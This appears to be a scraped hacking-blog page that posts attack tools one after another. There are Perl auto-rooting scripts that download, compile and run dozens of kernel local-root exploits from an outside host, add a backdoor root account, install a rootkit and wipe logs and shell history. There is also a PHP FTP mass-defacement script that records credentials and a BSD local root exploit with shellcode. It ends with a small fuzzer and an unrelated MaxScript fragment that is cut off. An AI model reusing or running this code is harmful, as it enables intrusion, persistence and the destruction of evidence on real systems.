system ("cd /tmp;mkdir 2.4.x;chmod 777 2.4.x;cd 2.4.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.4.x/elflbl;chmod 777 elflbl;./elflbl");
system ("id");
local6:;
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/h00lyshit;chmod 777 h00lyshit;./h00lyshit");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/krad;chmod 777 krad;./krad");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/myptrace;chmod 777 myptrace;./myptrace");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/hudo.c;gcc hudo.c -o hudo;chmod 777 hudo;./hudo");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/05;chmod 777 05;./05");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/krad2;chmod 777 krad2;./krad2");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/ong_bak.c;gcc ong_bak.c -o ong_bak;chmod 777 ong_bak;./ong_bak");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/2.6.9-55-2007-prv8;chmod 777 2.6.9-55-2007-prv8;./2.6.9-55-2007-prv8");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/04;chmod 777 04;./04");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/06;chmod 777 06;./06");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/r00t;chmod 777 r00t;./r00t");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/uselib24.c;gcc uselib24.c -o uselib24;chmod 777 uselib24;./uselib24");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/2.6.11.c;gcc 2.6.11.c -o 2.6.11;chmod 777 2.6.11;./2.6.11");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/k-rad.c;gcc k-rad.c -o k-rad;chmod 777 k-rad;./k-rad");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/k-rad3;chmod 777 k-rad3;./k-rad3");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/pwned;chmod 777 pwned;./pwned");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/binfmt_elf.c;gcc binfmt_elf.c -o binfmt_elf;chmod 777 binfmt_elf;./binfmt_elf");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/elfcd2.c;gcc elfcd2.c -o elfcd2;chmod 777 elfcd2;./elfcd2");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct1;chmod 777 prct1;./prct1");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct2;chmod 777 prct2;./prct2");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct3;chmod 777 prct3;./prct3");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct4;chmod 777 prct4;./prct4");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct6;chmod 777 prct6;./prct6");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/raptor;chmod 777 raptor;./raptor");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/2.6.17;chmod 777 2.6.17;./2.6.17");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/prct5.sh;chmod 777 prct5.sh;./prct5.sh");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/root;chmod 777 root;./root");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/cw7.3;chmod 777 cw7.3;./cw7.3");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/x;chmod 777 x;./x");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/x2;chmod 777 x2;./x2");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/exp.sh;chmod 777 exp.sh;./exp.sh");
system ("cd /tmp;mkdir 2.6.x;chmod 777 2.6.x;cd 2.6.x;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/2.6.x/root2;chmod 777 root2;./root2");
system ("id");
freebsd:;
system ("cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/bsd;chmod 777 bsd;./bsd");
system ("cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/48local;chmod 777 48local;./48local");
system ("cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/exploit;chmod 777 exploit;./exploit");
system ("cd /tmp;mkdir freebsd;chmod 777 freebsd;cd freebsd;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/freebsd/freedbs5.3;chmod 777 freedbs5.3;./freedbs5.3");
system ("id");
mac:;
system ("cd /tmp;mkdir mac;chmod 777 mac;cd mac;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/mac/macosX;chmod 777 macosX;./macosX");
system ("id");
red:;
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/afd-expl.c;gcc afd-expl.c -o afd-expl;chmod 777 afd-expl;./afd-expl");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/alsaplayer-suid.c;gcc alsaplayer-suid.c -o alsaplayer-suid;chmod 777 alsaplayer-suid;./alsaplayer-suid");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/nslconf.c;gcc nslconf.c -o nslconf;chmod 777 nslconf;./nslconf");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/ohMy-another-efs;chmod 777 ohMy-another-efs;./ohMy-another-efs");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/0x82-Remote.tannehehe.xpl.c;gcc 0x82-Remote.tannehehe.xpl.c -o 0x82-Remote.tannehehe.xpl;chmod 777 0x82-Remote.tannehehe.xpl;./0x82-Remote.tannehehe.xpl");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/efs_local;chmod 777 efs_local;./efs_local");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/ifenslave;chmod 777 ifenslave;./ifenslave");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/crontab.c;gcc crontab.c -o crontab;chmod 777 crontab;./crontab");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/epcs2.c;gcc epcs2.c -o epcs2;chmod 777 epcs2;./epcs2");
system ("cd /tmp;mkdir red;chmod 777 red;cd red;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/red/rh71sm8.c;gcc rh71sm8.c -o rh71sm8;chmod 777 rh71sm8;./rh71sm8");
system ("id");
sun:;
system ("cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/solaris27;chmod 777 solaris27;./solaris27");
system ("cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/final;chmod 777 final;./final");
system ("cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/sunos59;chmod 777 sunos59;./sunos59");
system ("cd /tmp;mkdir sun;chmod 777 sun;cd sun;wget http://www.bl4ck-viper.persiangig.com/p8/localroots/sun/sunos510.c;gcc sunos510.c -o sunos510;chmod 777 sunos510;./sunos510");
system ("id");
sysinfo:;
    system ("dmesg");
        print "\n\n";
            system ("set");
                print "\n\n";
                    system ("uname -a");
                        print "\n\n";
                            system ("uname -r");
                        print "\n\n";
                    system ("ifconfig");
                print "\n\n";
            goto command;
gccinfo:;
    system ("locate gcc");
        print "\n\n";
            goto command;
sysproc:;
    system ("ps aux");
        print "\n\n";
            goto command;
logc:;
system ("rm -rf /tmp/logs");
system ("rm -rf $HISTFILE");
system ("rm -rf /root/.ksh_history");
system ("rm -rf /root/.bash_history");
system ("rm -rf /root/.bash_logout");
system ("rm -rf /usr/local/apache/logs");
sleep(2);
system ("rm -rf /usr/local/apache/log");
system ("rm -rf /var/apache/logs");
system ("rm -rf /var/apache/log");
system ("rm -rf /var/run/utmp");
system ("rm -rf /var/logs");
system ("rm -rf /var/log");
sleep(2);
system ("rm -rf /var/adm");
system ("rm -rf /etc/wtmp");
system ("rm -rf /etc/utmp");
print "\n";
print "Done!";
goto command;
logs:;
print "\n";
    system ("cat /etc/syslog.conf");
        print "\n\n";
    goto command;
config:;
print "\n";
    system ("cat ./../mainfile.php");
        print "\n\n";
    goto command;

Baca Selengkapnya... Viper Auto Rooting Ver.2.0

Auto Rooting Script ver 1.0

#!/usr/bin/perl
#
# Auto Rooting Script ver 1.0
# BHG Security Center ~ #bhg
#   _____          __           __________               __
#  /  _  \  __ ___/  |_  ____   \______   \ ____   _____/  |_
# /  /_\  \|  |  \   __\/  _ \   |       _//  _ \ /  _ \   __\
#/    |    \  |  /|  | (  <_> )  |    |   (  <_> |  <_> )  |
#\____|__  /____/ |__|  \____/   |____|_  /\____/ \____/|__|
#        \/                             \/
#To start script "perl autoroot.pl r00t"
#Developers: Net.Edit0r ~ tHe.k!ll3r
#Home : Http://black-hg.org/cc
#Contact : Net.Edit0r@att.net ~ Black.hat.tm@Gmail.com
#Greetz to all members of BHG Security Center
print "###########################################################\n";
print "#            Auto rooter by #BHG (Net.Edit0r)             #\n";
print "#  Usage :                                                #\n";
print "#    perl $0 r00t    => To root                        #\n";
print "#    perl $0 del     => Delete Exploit                 #\n";
print "#    perl $0 -kit    => Add Rootkit                    #\n";
print "#    perl $0 user    => Add Root Account               #\n";
print "#      ********************************************       #\n";
print "#        [Home]:                                          #\n";
print "#              http://www.black-hg.org/cc                 #\n";
print "###########################################################\n\n\n";
 
 
if ($ARGV[0] =~ "r00t" )
{
print "Loading system configs";
print "...";
system("uname -a");
print "...";
system("id");
print "...";
print "...";
print "Gathering Exploit range";
print "28 exploits found";
print "Test Exploit F0r Rooting :D ...";
system("wget http://net-edit0r.persiangig.com/r00t/local");
system("chmod 777 local");
system("./local");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2.6.18.1.c");
system("gcc 2.6.18.1.c -o 2.6.18.1");
system("chmod 777 2.6.18.1");
system("./2.6.18.1");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2.6.34.2");
system("chmod 777 2.6.34.2");
system("./2.6.34.2");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2.6.33.c");
system("gcc 2.6.33.c -o 2.6.33");
system("chmod 777 2.6.33");
system("./2.6.33");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2.6.34.c");
system("gcc -w 2.6.34.c -o 2.6.34");
system("sudo setcap cap_sys_admin+ep 2.6.34");
system("./2.6.34");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2.6.37.c");
system("gcc 2.6.37.c -o 2.6.37");
system("chmod 777 2.6.37");
system("./2.6.37");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2.6.43.2.c");
system("gcc -w 2.6.43.2.c -o 2.6.43.2");
system("sudo setcap cap_sys_admin+ep 2.6.43.2");
system("chmod 777 2.6.43.2");
system("./2.6.43.2");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2.6.18.194.c");
system("gcc 2.6.18.194.c -o 2.6.18.194");
system("chmod 777 2.6.18.194");
system("./2.6.18.194");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/3.0.c");
system("gcc 3.0.c -o 3.0");
system("chmod 777 3.0");
system("./3.0");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2.6.18-2010/2.6.18");
system("chmod 777 2.6.18");
system("./2.6.18");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/x86_845.c");
system("gcc -o x86_84 x86_845.c");
system("chmod 777 x86_84");
system("./x86_84");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/abi5.c");
system("gcc -o abi abi5.c");
system("chmod 777 abi");
system("./abi");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2.6.2-20105.c");
system("gcc -o 2.6.2-20105 2.6.2-20105.c");
system("chmod 777 2.6.2-20105");
system("./2.6.2-20105");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2.6.13-20105.c");
system("gcc -o 2.6.13 2.6.13-20105.c");
system("chmod 777 2.6.13");
system("./2.6.13");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2.6.325.c");
system("gcc -o 2.6.32 2.6.325.c");
system("chmod 777 2.6.32");
system("./2.6.32");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2.6.39.c");
system("gcc -o 2.6.39 2.6.39.c");
system("chmod 777 2.6.39");
system("./2.6.39");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2.6.11.c");
system("gcc -o 2.6.11 2.6.11.c");
system("chmod 777 2.6.11");
system("./2.6.11");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2.6.182.c");
system("gcc -o 2.6.182 2.6.182.c");
system("chmod 777 2.6.182");
system("./2.6.182");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2.6.13.c");
system("gcc -o 2.6.13 2.6.13.c");
system("chmod 777 2.6.13");
system("./2.6.13");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2.6.18-6.c");
system("gcc -o 2.6.18-6 2.6.18-6.c");
system("chmod 777 2.6.18-6");
system("./2.6.18-6");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2010/robert_you_suck.c");
system("gcc -o kroooz robert_you_suck.c");
system("chmod 777 kroooz");
system("./kroooz");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2010/sec.c");
system("gcc -o sec sec.c");
system("chmod 777 sec");
system("./sec");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2010/2.6.18");
system("chmod 777 2.6.18");
system("./2.6.18");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2010/priv8-2.6.18-164-2010");
system("chmod 777 priv8-2.6.18-164-2010");
system("./priv8-2.6.18-164-2010");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2010/priv8-2.6.18.2010");
system("chmod 777 priv8-2.6.18.2010");
system("./priv8-2.6.18.2010");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2010/2010-1");
system("chmod 777 2010-1");
system("./2010-1");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2010/local2627");
system("chmod 777 local2627");
system("./local2627");
system("id");
system("wget http://net-edit0r.persiangig.com/r00t/2010/ia32syscall");
system("chmod 777 ia32syscall");
system("./ia32syscall");
system("id");
print "Exploit 11 ...";
system("uname -a");
system("id;pwd");
print "Fucking r00t!? :d";
 
}
if ($ARGV[0] =~ "del" )
{
print "All Exploit deleting ...\n";
system("rm local*;rm -rf 2.6*;rm 3.0*;rm -rf 3.0*;rm -rf 2.6.34.2;rm -rf 2.6.18.194;rm -rf 2.6.13;rm -rf 2.6.182;rm -rf 2.6.11");
system("rm 2.6.39*;rm -rf 2.6.32*;rm 2.6.2*;rm -rf abi*;rm -rf x86_84;rm -rf 2.6.2-20105;rm -rf 2.6.325;rm -rf 2.6.18-6");
system("rm ia32syscall;rm -rf local2627;rm -rf 2010-1;rm -rf priv8-2.6.18.2010;rm -rf priv8-2.6.18-164-2010;rm -rf sec.c;rm -rf robert_you_suck.c;rm -rf 2.6.18-6.c");
}
     if ($ARGV[0] =~ "user" )
          {
print "Add Root Account [ t ]\n";
print "user : [ roor ]\n";
system "adduser -g 0 roor -G wheel,sys,bin,daemon,adm,disk -d /sf7 -s /bin/sh";
system "passwd rootbhg";
print "pass is : rootbhg\n";
sleep(2);
 
     }
     if ($ARGV[0] =~ "rm" )
          {
print "rm -rf Log [ rm ] \n";
system "rm -rf /tmp/logs";
system "rm -rf /root/.ksh_history";
system "rm -rf /root/.bash_history";
system "rm -rf /root/.bash_logout";
system "rm -rf /usr/local/apache/logs";
sleep(2);
system "rm -rf /usr/local/apache/log";
system "rm -rf /var/apache/logs";
system "rm -rf /var/apache/log";
system "rm -rf /var/run/utmp";
system "rm -rf /var/logs";
system "rm -rf /var/log";
sleep(2);
system "rm -rf /var/adm";
system "rm -rf /etc/wtmp";
system "rm -rf /etc/utmp";
system "cd /bin";
print "\tcompleted .. \n\n";
     }
if ($ARGV[0] =~ "-kit" )
          {
print "Add Rootkit \n";
system "wget http://net-edit0r.persiangig.com/t00lz/rootkit.tar.gz";
system "tar -xvvzf rootkit.tar.gz";
system "cd rootkit;./install";
print "user : wo7oshv4team ,  pass : v4teamhacker \n";
system "id";
print "\tcompleted .. \n\n";
     }
# Code By Net.Edit0r ~ tHe.k!ll3r For ALL Iranian HackerZ /* ARAB Gulf F0r Ever */
# END

Baca Selengkapnya... Auto Rooting Script ver 1.0

Ftp mass deface

 ______ _           __  __                 _____        __              
|  ____| |         |  \/  |               |  __ \      / _|             
| |__  | |_ _ __   | \  / | __ _ ___ ___  | |  | | ___| |_ __ _  ___ ___
|  __| | __| '_ \  | |\/| |/ _` / __/ __| | |  | |/ _ \  _/ _` |/ __/ _ \
| |    | |_| |_) | | |  | | (_| \__ \__ \ | |__| |  __/ || (_| | (_|  __/
|_|     \__| .__/  |_|  |_|\__,_|___/___/ |_____/ \___|_| \__,_|\___\___|
           | |                                                          
           |_|                                                          
            
Coded by indonesianpeople
          
";
$ftp_server=trim($domain[$i]);
$ftp_user_name=trim($user[$i]);
$ftp_user_pass=trim($pass[$i]);
 
    $o = @fsockopen($ftp_server, 21);
if(!$o){
        continue;
    }
$conn_id = @ftp_connect($ftp_server);
$login_result = @ftp_login($conn_id, $ftp_user_name, $ftp_user_pass);
if ((!$conn_id) || (!$login_result)) {
 
   echo "Error $ftp_server wrong password 
";flush();
  continue;
  } else
  {
 
  echo "Connected to $ftp_server User $ftp_user_name and pass ($ftp_user_pass)
";flush();
  }
 
$upload = ftp_put($conn_id, "/public_html/index.php", "index.txt", FTP_BINARY);
 
if (!$upload) {
 
    echo "Upload error
";flush();
  }
  else
  {
 
  echo "File uploaded
";  flush();
   
$fh2 = fopen("log.txt", 'a') ;
fwrite($fh2,"http://$ftp_server User $ftp_user_name and pass ($ftp_user_pass)\n");
fclose($fh2);
  }
ftp_close($conn_id);
 
}

Baca Selengkapnya... Ftp mass deface

BSD/x86 Ver. 8.x - Local Root Exploit

/*
 *
 *
 * 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 * 0      _                   __           __       __                      1
 * 1    /' \            __  /'__`\        /\ \__  /'__`\                    0
 * 0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
 * 1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
 * 0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
 * 1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
 * 0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
 * 1                   \ \____/ >> Exploit database separated by exploit    0
 * 0                    \/___/          type (local, remote, DoS, etc.)     1
 * 1                                                                        1
 * 0   [x] Official Website: http://www.1337day.com                         0
 * 1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
 * 0                                                                        0
 * 1               ==========================================               1
 * 0               I'm Taurus Omar Member From Inj3ct0r TEAM                1
 * 1               ==========================================               0
 * 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
 * |                                                                        |
 * |                 BSD/x86  Ver. 8.x - Local Root Exploit                 |     
 * --------------------------------------------------------------------------
 * 
 * +----------------| ABOUT ME |--------------------+
 * NAME:     TAURUS OMAR                            -
 * LINE:     INDEPENDENT SECURITY RESEARCHER        -
 * HOME:     ACCESOILEGAL.BLOGSPOT.COM              -
 * TWITTER:  @taurusomar_                           -
 * E-MAIL:   omar-taurus[at]dragonsecurity[dot]org  -
 * E-MAIL:   omar-taurus[at]live[dot]com            -
 * PWNED:    #ZUUU                                  -
 * +------------------------------------------------+ 
 *
 *
 * +-------------------------------+
 * Proof of CONCEPT IMAGES 
 * http://i.imgur.com/whR3E.jpg
 * +-------------------------------+
 * Usage: 
 * gcc 1337.c -o 1337
 * chmod 777 1337
 * ./1337
 *
 */

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 
 
main (int argc, char *argv[]) {
        int s, f, k2;
        struct sockaddr_in addr;
        int flags;
        char str32[]=
"\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d\x2f\x74\x6d\x89\xe3"
"\x50\x50\x53\xb0\x10\x50\xcd\x80\x68\xed\x0d\x00\x00\x53\xb0\x0f"
"\x50\xcd\x80\x31\xc0\x6a\x00\x68\x2f\x73\x68\x32\x68\x2f\x74\x6d"
"\x70\x89\xe3\x50\x54\x53\x50\xb0\x3b\xcd\x80";
        char str64[]=
"\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05\x2f\x74\x6d\x70\x2f\x73\x68"
"\x48\xc1\xef\x08\x57\x48\x89\xe7\x48\x31\xf6\x48\x31\xd2\x0f\x05"
"\xb0\x0f\x48\x31\xf6\x66\xbe\xed\x0d\x0f\x05\x48\x31\xc0\x99\xb0"
"\x3b\x48\xbf\x2f\x74\x6d\x70\x2f\x73\x68\x32\x6a\x00\x57\x48\x89"
"\xe7\x57\x52\x48\x89\xe6\x0f\x05";
 
        char buf[20000];
 
        char *p;
        struct stat sb;
        int n;
        fd_set wset;
        int64_t size;
        off_t sbytes;
        off_t sent = 0;
        int chunk;
        int arch = 3;
 
        if (argc != 2) {
                printf("Definiendo Arquitectura.\n");
                return;
        }
 
        if (strcmp(argv[1], "i386") == 0)
                arch=1;
 
        if (strcmp(argv[1], "amd64") == 0)
                arch=2;
 
        if (arch == 3) {
                printf("Arquitectura Definida i386 or amd64\n");
                return;
        }
 
        s = socket(AF_INET, SOCK_STREAM, 0);
        bzero(&addr, sizeof(addr));
        addr.sin_family = AF_INET;
        addr.sin_port = htons(7030);
        addr.sin_addr.s_addr = inet_addr("127.0.0.1");
 
        n = connect(s, (struct sockaddr *)&addr, sizeof (addr));
        if (n < 0)
                warn ("fail to connect");
 
        f = open("/bin/sh", O_RDONLY);
        if (f<0)
                warn("fail to open file");
        n = fstat(f, &sb);
        if (n<0)
                warn("fstat failed");
 
        size = sb.st_size;
        chunk = 0;
 
        flags = fcntl(f, F_GETFL);
        flags |= O_NONBLOCK;
        fcntl(f, F_SETFL, flags);
 
        while (size > 0) {
 
                FD_ZERO(&wset);
                FD_SET(s, &wset);
                n = select(f+1, NULL, &wset, NULL, NULL);
                if (n < 0)
                        continue;
 
                if (chunk > 0) {
                        sbytes = 0;
                        if (arch == 1)
                        n = sendfile(f, s, 2048*2, chunk, NULL, &sbytes,0);
                        if (arch == 2)
                        n = sendfile(f, s, 1204*6, chunk, NULL, &sbytes,0);
                        if (n < 0)
                                continue;
                        chunk -= sbytes;
                        size -= sbytes;
                        sent += sbytes;
                        continue;
                }
 
                chunk = 2048;
 
                memset(buf, '\0', sizeof buf);
                if (arch == 1) {
                        for (k2=0;k2<256;k2++) {
                                buf[k2] = 0x90;
                        }
                        p = buf;
                        p = p + k2;
                        memcpy(p, str32, sizeof str32);
 
                        n = k2 + sizeof str32;
                        p = buf;
                }
 
                if (arch == 2) {
                        for (k2=0;k2<100;k2++) {
                                buf[k2] = 0x90;
                        }
                        p = buf;
                        p = p + k2;
                        memcpy(p, str64, sizeof str64);
 
                        n = k2 + sizeof str64;
                        p = buf;
                }
 
                write(s, p, n);
        }
}


# 1337day.com [2012-09-22]

Baca Selengkapnya... BSD/x86 Ver. 8.x - Local Root Exploit

Simple fuzzer.py

#!/usr/bin/python

import random

def randomfunc(length, allthecrap):
    randomstuff = ""
    for number in range(1,length + 1):
        randomthing = random.choice(allthecrap)
        randomstuff += randomthing
        if number == length:
     crud = open("crud.txt", "w")
     crud.write(randomstuff)
     crud.close()

def choices():
    length = int(raw_input("Enter the length: "))
    allthecrap = u"""ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789~!@#$%^&*()_-<>/\:;,.`'"[]{}|"""
    randomfunc(length, allthecrap)

choices()

Baca Selengkapnya... Simple fuzzer.py

Maxsciprt for Doa5 research

clearlistener ()

fsource = "D:\\_DLCREPACK\\UNPACK\\KASUMI_DLC_006.TMC"

fsource = ("D:\\DOA5JtagRip_Boobooman\\DOA5JtagRip_Boobooman\\"+\
"Dead_or_Alive_5\\chara_common\\_Dump\\_Dump\\AYANE_COS_005.TMC")

fsource = GetOpenFileName \
caption:"Select TMC File" \
types: "Tecmo Memory Catelog(*.tmc)|*.TMC|All files (*.*)|*.*|"

if (fsource!=undefined) then (
fpath=getFilenamePath fsource
fname=getFilenameFile fsource
fsize=getFileSize fsource
lsource = (fpath+fname+".TMCL")
if ((doesFileExist fsource)==false) do ( 
lsource = GetOpenFileName \
caption:"Select TMCL File" \
types: "Tecmo Memory Catelog Load(*.tmcl)|*.TMCL|All files (*.*)|*.*|")
if (lsource!=undefined) AND ((doesFileExist fsource)==true) then (


printTex = false
printMat = true

buildMsh = true
drawp = true

dumpDDS = true
dumpXPR = false

model_scale = 100


-- obj = $*;delete obj


f = fopen fsource "rb"
l = fopen lsource "rb"


GLOBAL dataArray = #()
struct TMC (filename,id,offset)
-- struct MdlGeo ()
struct ObjGeo (name,GeoDecl,modeldata)
-- struct TTX ()
struct VtxLay (offset)
struct IdxLay (offset)
-- struct MtrCol ()
-- struct MdlInfo ()
-- struct HieLay ()
struct LHeader (offset,size)
-- struct NodeLay ()
-- struct GlblMtx ()
-- struct BnOfsMtx ()
-- struct cpf ()
-- struct MCAPACK ()
struct MCAPARAM (ukn1)
-- struct ACSCLS ()
struct bone_data (obj,name,matrix,parent,children)
struct entry (tag,flags,size,adr,data,offsets,sizes,children)
struct mesh_data (subobj_index,vertex_start,face_start,vertex_stride,vertex_type,vertex_counts,face_counts)
struct xpr2_entry (magic,offset,size,string_offset,string)
struct tx2d_entry (ukn01,ukn02,ukn03,ukn04,ukn05,ukn06,ukn07,ukn08,ukn09, \
ukn10,ukn11,ukn12,ukn13,ukn14,ukn15,ukn16,ukn17,ukn18,ukn19)

fn Get_TMCSUBBLOCK id= (
case id of (
